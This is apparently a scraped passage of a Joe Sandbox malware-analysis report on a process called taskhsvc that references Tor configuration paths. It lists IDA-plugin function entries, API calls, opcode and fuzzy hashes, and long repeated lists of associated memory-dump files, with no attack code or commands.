Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID: C:\Users\user\AppData\Roaming\tor\torrc$C:\Users\user\AppData\Roaming\tor\torrc-defaults$z9
API String ID: 4216919130-4137550407
Opcode ID: eb929399c8e35ed9653031612f47e97a7f3bb773578a4278829d38cbe016fee2
Instruction ID: 6ce99342eb875460867921b0d9ad06c4647fae45d697366bbb98d005ba760048
Opcode Fuzzy Hash: eb929399c8e35ed9653031612f47e97a7f3bb773578a4278829d38cbe016fee2
Instruction Fuzzy Hash: E1F03CB4908309AFCB41EF69C59526EBBE0FB45344F06C81CE1D49B355D6789846CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00DC3047 Relevance: 6.2, APIs: 4, Instructions: 200COMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00DC30A2
__stack_chk_fail.LIBSSP-0 ref: 00DC33E6

Part of subcall function 00EE9B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00EE45AC), ref: 00EE9B69

Part of subcall function 00EFB94F: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DC311A), ref: 00EFB9AB
Part of subcall function 00EFB94F: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DC311A), ref: 00EFB9EA
Part of subcall function 00EFB94F: memset.MSVCRT ref: 00EFBA05
Part of subcall function 00EFB94F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00DC311A), ref: 00EFBAEA

Part of subcall function 00DB8718: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00DBF09F), ref: 00DB873F

free.MSVCRT ref: 00DC31CA
free.MSVCRT ref: 00DC335D

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortfree$getsocknamememset
String ID:
API String ID: 2758675185-0
Opcode ID: 257da49826d6c19fcc88e75c2a3fd22fd8b0fe3563c373fb1474da6422fa40dd
Instruction ID: e1a1c4ca88beca15682bc7d6e5180e9c91d3b583514dba06343aed0ead291057
Opcode Fuzzy Hash: 257da49826d6c19fcc88e75c2a3fd22fd8b0fe3563c373fb1474da6422fa40dd
Instruction Fuzzy Hash: C3A1D274A08769CFDB20EF64C885B9DBBF4BF44304F00C899E589A7251E7749A84DF22

Uniqueness

Uniqueness Score: -1.00%

Function 00E55388 Relevance: 6.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

Part of subcall function 00EE9B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00EE45AC), ref: 00EE9B69

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

time.MSVCRT ref: 00E553C3
abort.MSVCRT ref: 00E55405

Part of subcall function 00E55009: free.MSVCRT ref: 00E550EF
Part of subcall function 00E55009: __stack_chk_fail.LIBSSP-0 ref: 00E5512F

Part of subcall function 00E03770: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00E278D1), ref: 00E0379C

Part of subcall function 00E54F4F: abort.MSVCRT ref: 00E54F9F
Part of subcall function 00E54F4F: __stack_chk_fail.LIBSSP-0 ref: 00E54FC8

Part of subcall function 00E04FEA: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00E979D4), ref: 00E05035

abort.MSVCRT ref: 00E55444
__stack_chk_fail.LIBSSP-0 ref: 00E55635

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Memory Dump Source

Source File: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$strrchr$freetime
String ID:
API String ID: 4097820427-0
Opcode ID: 6d2cc3d04922574dcb49ff9503761c6329f5991f770764fd079ac947fad4c733
Instruction ID: a399c52fd5133e9e92123dbeae40987de70a80931a5b8b64835b22d3402a73f2
Opcode Fuzzy Hash: 6d2cc3d04922574dcb49ff9503761c6329f5991f770764fd079ac947fad4c733
Instruction Fuzzy Hash: 7B81B0B4E04709DFCB00EFA9D585AADBBF1BF08305F119819E894AB351E7389984CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00DBCEB8 Relevance: 6.2, APIs: 4, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

Part of subcall function 00DB8718: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00DBF09F), ref: 00DB873F

memset.MSVCRT ref: 00DBCFFA
memset.MSVCRT ref: 00DBD09B
abort.MSVCRT ref: 00DBD11A
__stack_chk_fail.LIBSSP-0 ref: 00DBD1BD

Part of subcall function 00EFD28C: abort.MSVCRT ref: 00EFD2DC
Part of subcall function 00EFD28C: __stack_chk_fail.LIBSSP-0 ref: 00EFD3BB

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortmemset
String ID:
API String ID: 4248982965-0
Opcode ID: ad65be5b6c915f3f71420a8a8d87a1d61603b274e72bc6eed23a253d0a47c129
Instruction ID: b34294b92d5bd52125bb2ac9ae4a0c19ba25cda0de7409a4575fe16e28378db0
Opcode Fuzzy Hash: ad65be5b6c915f3f71420a8a8d87a1d61603b274e72bc6eed23a253d0a47c129
Instruction Fuzzy Hash: FC81A4B4909319CFDB20EF25C9857DDBBF0BF48304F0088A9E589A7251E7749A84DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4527 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DB459D

Part of subcall function 00DB331A: __stack_chk_fail.LIBSSP-0 ref: 00DB335F

abort.MSVCRT ref: 00DB45E0
__stack_chk_fail.LIBSSP-0 ref: 00DB4715

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DB46E5

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

